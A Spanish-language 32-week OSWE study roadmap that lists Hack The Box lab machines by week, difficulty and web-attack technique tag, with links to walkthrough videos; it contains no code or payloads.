Avanzado WEB - OSWE Roadmap
Este roadmap está inspirado al 100% en el HackingVault de s4vitar, diseñado para preparar la certificación OSWE (Offensive Security Web Expert). El enfoque es puramente Web Avanzado (White Box), revisión de código, deserialización insegura y bypass de filtros.
Objetivo: Desarrollar una mentalidad de revisión de código y automatización de exploits (Python scripting).
Recurso: La propiedad intelectual y todas las resoluciones en video pertenecen al canal público de S4viSinFiltro.
🟢 FASE 1: FUNDAMENTOS WEB
SEMANA 1: Arquitectura Web
Enfoque: Fundamentos sólidos de desarrollo y HTTP.
Técnicas Clave: HTTP protocol deep dive, Session management.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Admirer | Hack The Box | Easy | Ver 🎥 | Adminer / FTP | |
| Backdoor | Hack The Box | Easy | Ver 🎥 | WordPress / LFI | |
| Blunder | Hack The Box | Easy | Ver 🎥 | Blunder CMS | |
| Bounty | Hack The Box | Easy | Ver 🎥 | IIS / ASP | |
| BountyHunter | Hack The Box | Easy | Ver 🎥 | XXE |
SEMANA 2: Client-Side Attacks
Enfoque: XSS, CSRF y Clickjacking.
Técnicas Clave: XSS variants, CSRF chains.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Doctor | Hack The Box | Easy | Ver 🎥 | SSTI / Splunk | |
| Haystack | Hack The Box | Easy | Ver 🎥 | ElasticSearch | |
| Headless | Hack The Box | Easy | Ver 🎥 | XSS / Cookie Hijacking | |
| Laboratory | Hack The Box | Easy | Ver 🎥 | Gitlab | |
| Late | Hack The Box | Easy | Ver 🎥 | SSTI (OCR) |
SEMANA 3: SQL & NoSQL Injection
Enfoque: Inyecciones avanzadas.
Técnicas Clave: SQLi manual, NoSQL injection.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| MonitorsTwo | Hack The Box | Easy | Ver 🎥 | Cacti / Docker | |
| OpenSource | Hack The Box | Easy | Ver 🎥 | Gitea / Git Hooks | |
| PC | Hack The Box | Easy | Ver 🎥 | SQLMap / gRPC | |
| Perfection | Hack The Box | Easy | Ver 🎥 | SSTI / Ruby | |
| Postman | Hack The Box | Easy | Ver 🎥 | Redis / Webmin |
SEMANA 4: File Inclusion
Enfoque: LFI, RFI y Path Traversal.
Técnicas Clave: Wrappers PHP, Log Poisoning.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| RedPanda | Hack The Box | Easy | Ver 🎥 | SSTI / XML | |
| Sea | Hack The Box | Easy | Ver 🎥 | CMS Wonder | |
| Secret | Hack The Box | Easy | Ver 🎥 | JWT / API | |
| Sense | Hack The Box | Easy | Ver 🎥 | Pfsense | |
| Shoppy | Hack The Box | Easy | Ver 🎥 | NoSQLi |
SEMANA 5: XML & XXE (Parte 1)
Enfoque: Ataques a parsers XML.
Técnicas Clave: XXE OOB, XPath injection.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Sightless | Hack The Box | Easy | Ver 🎥 | SQLi / Chrome Debug | |
| Soccer | Hack The Box | Easy | Ver 🎥 | WebSocket SQLi | |
| SteamCloud | Hack The Box | Easy | Ver 🎥 | Kubernetes | |
| Stocker | Hack The Box | Easy | Ver 🎥 | NoSQLi / PDF Gen | |
| SwagShop | Hack The Box | Easy | Ver 🎥 | Magento |
SEMANA 6: XML & XXE (Parte 2)
Enfoque: Continuación de vectores XML.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Teacher | Hack The Box | Easy | Ver 🎥 | Moodle | |
| Trick | Hack The Box | Easy | Ver 🎥 | SQLi / DNS | |
| TwoMillion | Hack The Box | Easy | Ver 🎥 | API Logic | |
| Usage | Hack The Box | Easy | Ver 🎥 | SQLi / Cookie |
🟠 FASE 2: NIVEL INTERMEDIO
SEMANA 7: Template Engines (SSTI)
Enfoque: Server-Side Template Injection.
Técnicas Clave: Jinja2, Twig, Freemarker, Smarty.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Awkward | Hack The Box | Medium | Ver 🎥 | JWT / API | |
| Backend | Hack The Box | Medium | Ver 🎥 | API | |
| BackendTwo | Hack The Box | Medium | Ver 🎥 | API | |
| Bart | Hack The Box | Medium | Ver 🎥 | PHP / Internal | |
| Blurry | Hack The Box | Medium | Ver 🎥 | ClearML (Pickle) |
SEMANA 8: Deserialización (Fundamentos)
Enfoque: Java, PHP, Python.
Técnicas Clave: Object Injection, Gadgets básicos.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Bolt | Hack The Box | Medium | Ver 🎥 | CMS Bolt / Templating | |
| Book | Hack The Box | Medium | Ver 🎥 | XSS / SQL Truncation | |
| BroScience | Hack The Box | Medium | Ver 🎥 | PHP Deserialization | |
| Cache | Hack The Box | Medium | Ver 🎥 | HMS / Docker | |
| Cat | Hack The Box | Medium | Ver 🎥 | Android / API |
SEMANA 9: Autenticación & OAuth
Enfoque: OAuth, SAML y Bypasses.
Técnicas Clave: Token manipulation, Logic flaws en login.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Catch | Hack The Box | Medium | Ver 🎥 | APK / API | |
| Celestial | Hack The Box | Medium | Ver 🎥 | Node Deserialization | |
| Clicker | Hack The Box | Medium | Ver 🎥 | NFS / Web Logic | |
| Cronos | Hack The Box | Medium | Ver 🎥 | DNS / SQLi | |
| DevOops | Hack The Box | Medium | Ver 🎥 | XML / Git |
SEMANA 10: API Security
Enfoque: GraphQL y REST.
Técnicas Clave: Introspection, Mass Assignment.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Encoding | Hack The Box | Medium | Ver 🎥 | PHP filters / Git | |
| Epsilon | Hack The Box | Medium | Ver 🎥 | ||
| Europa | Hack The Box | Medium | Ver 🎥 | Regex | |
| Faculty | Hack The Box | Medium | Ver 🎥 | mPDF / SQLi | |
| Flustered | Hack The Box | Medium | Ver 🎥 | Squid Proxy |
SEMANA 11: WebSockets & CORS
Enfoque: Vulnerabilidades en comunicación asíncrona.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| FluxCapacitor | Hack The Box | Medium | Ver 🎥 | WAF Bypass | |
| Forge | Hack The Box | Medium | Ver 🎥 | SSRF | |
| Format | Hack The Box | Medium | Ver 🎥 | Microblog / Lua | |
| Giddy | Hack The Box | Medium | Ver 🎥 | SQLi / Unquoted | |
| Health | Hack The Box | Medium | Ver 🎥 | Webhook / Filters |
SEMANA 12: WebSockets & CORS (Parte 2)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | IClean | Hack The Box | Medium | Ver 🎥 | XSS / SSTI | | | Inception | Hack The Box | Medium | Ver 🎥 | WebDav / Squid | | | Interface | Hack The Box | Medium | Ver 🎥 | API / DOMpdf | | | Jewel | Hack The Box | Medium | Ver 🎥 | Git / Deserialization | | | Jupiter | Hack The Box | Medium | Ver 🎥 | Postgres / Grafana |
SEMANA 13: WebSockets & CORS (Parte 3)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | Lazy | Hack The Box | Medium | Ver 🎥 | Oracle Padding | | | Mango | Hack The Box | Medium | Ver 🎥 | NoSQLi | | | Mentor | Hack The Box | Medium | Ver 🎥 | API | | | Meta | Hack The Box | Medium | Ver 🎥 | ImageMagick | | | Monitored | Hack The Box | Medium | Ver 🎥 | Nagios / API |
SEMANA 14: WebSockets & CORS (Parte 4)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | MonitorsThree| Hack The Box | Medium | Ver 🎥| SQLi / Cacti | | | Nineveh | Hack The Box | Medium | Ver 🎥 | Hyde / LFI | | | Noter | Hack The Box | Medium | Ver 🎥 | Flask / JWT | | | Obscurity | Hack The Box | Medium | Ver 🎥 | Custom Py Server | | | OnlyForYou | Hack The Box | Medium | Ver 🎥 | LFI / Neo4j |
SEMANA 15: WebSockets & CORS (Parte 5)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | Passage | Hack The Box | Medium | Ver 🎥 | CuteNews | | | Pov | Hack The Box | Medium | Ver 🎥 | | | | Runner | Hack The Box | Medium | Ver 🎥 | TeamCity | | | Schooled | Hack The Box | Medium | Ver 🎥 | Moodle / XSS | | | Seal | Hack The Box | Medium | Ver 🎥 | Tomcat / GitBucket |
SEMANA 16: WebSockets & CORS (Parte 6)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | StreamIO | Hack The Box | Medium | Ver 🎥 | Firefox / Forensics | | | Strutted | Hack The Box | Medium | Ver 🎥 | Apache Struts | | | TartarSauce| Hack The Box | Medium | Ver 🎥| Wordpress | | | TheNotebook| Hack The Box | Medium | Ver 🎥| JWT / Docker | | | Time | Hack The Box | Medium | Ver 🎥 | Java Deserialization |
SEMANA 17: WebSockets & CORS (Parte 7)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | Timing | Hack The Box | Medium | Ver 🎥 | PHP / File Include | | | Trickster | Hack The Box | Medium | Ver 🎥 | PrestaShop | | | Undetected | Hack The Box | Medium | Ver 🎥 | PHP / Modsecurity | | | Unicode | Hack The Box | Medium | Ver 🎥 | JWT / Unicode | | | UpDown | Hack The Box | Medium | Ver 🎥 | File Upload |
SEMANA 18: WebSockets & CORS (Parte 8)
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas | | :—: | :— | :— | :— | :—: | :— | | | Wall | Hack The Box | Medium | Ver 🎥 | API / Python | | | Writer | Hack The Box | Medium | Ver 🎥 | SQLi / ImageMagic | | | Zipping | Hack The Box | Medium | Ver 🎥 | Zip Slip |
🔴 FASE 3: NIVEL AVANZADO (WHITE BOX)
SEMANA 19: Deserialización Avanzada
Enfoque: Gadget chains personalizadas.
Técnicas Clave: POP chains, Custom gadget chains.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| AdmirerToo | Hack The Box | Hard | Ver 🎥 | OpenCATS | |
| Altered | Hack The Box | Hard | Ver 🎥 | Code Igniter / PHP | |
| Analysis | Hack The Box | Hard | Ver 🎥 | LDAP / Socket | |
| Breadcrumbs | Hack The Box | Hard | Ver 🎥 | Windows / SQLi |
SEMANA 20: Type Juggling & Race Conditions
Enfoque: Errores lógicos en el tiempo de ejecución.
Técnicas Clave: Time-of-check attacks, Type juggling.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Carpediem | Hack The Box | Hard | Ver 🎥 | Docker | |
| Charon | Hack The Box | Hard | Ver 🎥 | SQLi Union | |
| Control | Hack The Box | Hard | Ver 🎥 | MySQL | |
| CrimeStoppers | Hack The Box | Hard | Ver 🎥 | PHP / Zip |
SEMANA 21: SSTI Avanzado
Enfoque: Sandbox escape y filter bypass.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Dab | Hack The Box | Hard | Ver 🎥 | Windows | |
| Drive | Hack The Box | Hard | Ver 🎥 | SQLite / API | |
| EarlyAccess | Hack The Box | Hard | Ver 🎥 | PHP / Keygen | |
| Falafel | Hack The Box | Hard | Ver 🎥 | PHP / SQLi |
SEMANA 22: Code Review & Logic Flaws I
Enfoque: Frameworks custom y revisión de código fuente.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Feline | Hack The Box | Hard | Ver 🎥 | Tomcat / Java Deserialization | |
| Flujab | Hack The Box | Hard | Ver 🎥 | ||
| Freelancer | Hack The Box | Hard | Ver 🎥 | SQLi / MSSQL | |
| Hancliffe | Hack The Box | Hard | Ver 🎥 | Unity / SSRF |
SEMANA 23: Code Review & Logic Flaws II
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Holiday | Hack The Box | Hard | Ver 🎥 | Node / SQLi | |
| Joker | Hack The Box | Hard | Ver 🎥 | Squid | |
| Kotarak | Hack The Box | Hard | Ver 🎥 | Tomcat | |
| Moderators | Hack The Box | Hard | Ver 🎥 | WordPress / Logs |
SEMANA 24: Code Review & Logic Flaws III
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Monitors | Hack The Box | Hard | Ver 🎥 | Wordpress | |
| Object | Hack The Box | Hard | Ver 🎥 | Jenkins | |
| Oouch | Hack The Box | Hard | Ver 🎥 | DBus / OAuth | |
| Overflow | Hack The Box | Hard | Ver 🎥 | Padding Oracle / Cookie |
SEMANA 25: Code Review & Logic Flaws IV
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Overgraph | Hack The Box | Hard | Ver 🎥 | ||
| Oz | Hack The Box | Hard | Ver 🎥 | Docker / Knocking | |
| Phoenix | Hack The Box | Hard | Ver 🎥 | Wordpress | |
| Player | Hack The Box | Hard | Ver 🎥 | GraphQL / FFMPEG |
SEMANA 26: Code Review & Logic Flaws V
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Pressed | Hack The Box | Hard | Ver 🎥 | Wordpress | |
| Quick | Hack The Box | Hard | Ver 🎥 | HTTP/2 / ESI Injection | |
| Static | Hack The Box | Hard | Ver 🎥 | PHP / Gzip | |
| Talkative | Hack The Box | Hard | Ver 🎥 | Jamovi |
SEMANA 27: Code Review & Logic Flaws VI
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Tentacle | Hack The Box | Hard | Ver 🎥 | Squid / Kerberos | |
| Travel | Hack The Box | Hard | Ver 🎥 | SSRF / Gopher | |
| Unbalanced | Hack The Box | Hard | Ver 🎥 | Rsync / Encfs | |
| Unobtainium | Hack The Box | Hard | Ver 🎥 | Kubernetes |
SEMANA 28: Insane Challenges I
Enfoque: Máquinas Insane.
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Yummy | Hack The Box | Hard | Ver 🎥 | MVC | |
| Anubis | Hack The Box | Insane | Ver 🎥 | Container Breakout | |
| Ariekei | Hack The Box | Insane | Ver 🎥 | Docker / Ansible | |
| Bankrobber | Hack The Box | Insane | Ver 🎥 | XSS / SQLi / Wrapper |
SEMANA 29: Insane Challenges II
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Bookworm | Hack The Box | Hard | Ver 🎥 | ||
| CTF | Hack The Box | Insane | Ver 🎥 | LDAP / Token | |
| Crossfit | Hack The Box | Insane | Ver 🎥 | XSS / FTP | |
| Fighter | Hack The Box | Hard | Ver 🎥 |
SEMANA 30: Insane Challenges III
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Fortune | Hack The Box | Insane | Ver 🎥 | OpenBSD | |
| Fulcrum | Hack The Box | Hard | Ver 🎥 | Redis | |
| Hackback | Hack The Box | Insane | Ver 🎥 | XML / JSON | |
| MagicGardens | Hack The Box | Insane | Ver 🎥 | Django / SSTI |
SEMANA 31: Insane Challenges IV
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Minion | Hack The Box | Insane | Ver 🎥 | ASP / SQLi | |
| Mischief | Hack The Box | Hard | Ver 🎥 | IPv6 / SNMP | |
| MultiMaster | Hack The Box | Hard | Ver 🎥 | AD / MSSQL | |
| Nightmare | Hack The Box | Insane | Ver 🎥 | SQLi / Buffer Overflow |
SEMANA 32: Recta Final
| Estado | Máquina | Plataforma | Dificultad | Resolución | Notas |
|---|---|---|---|---|---|
| Sink | Hack The Box | Insane | Ver 🎥 | HTTP Headers | |
| Stacked | Hack The Box | Insane | Ver 🎥 | XSS / LocalStack | |
| Toby | Hack The Box | Medium | Ver 🎥 | Docker / Jenkins |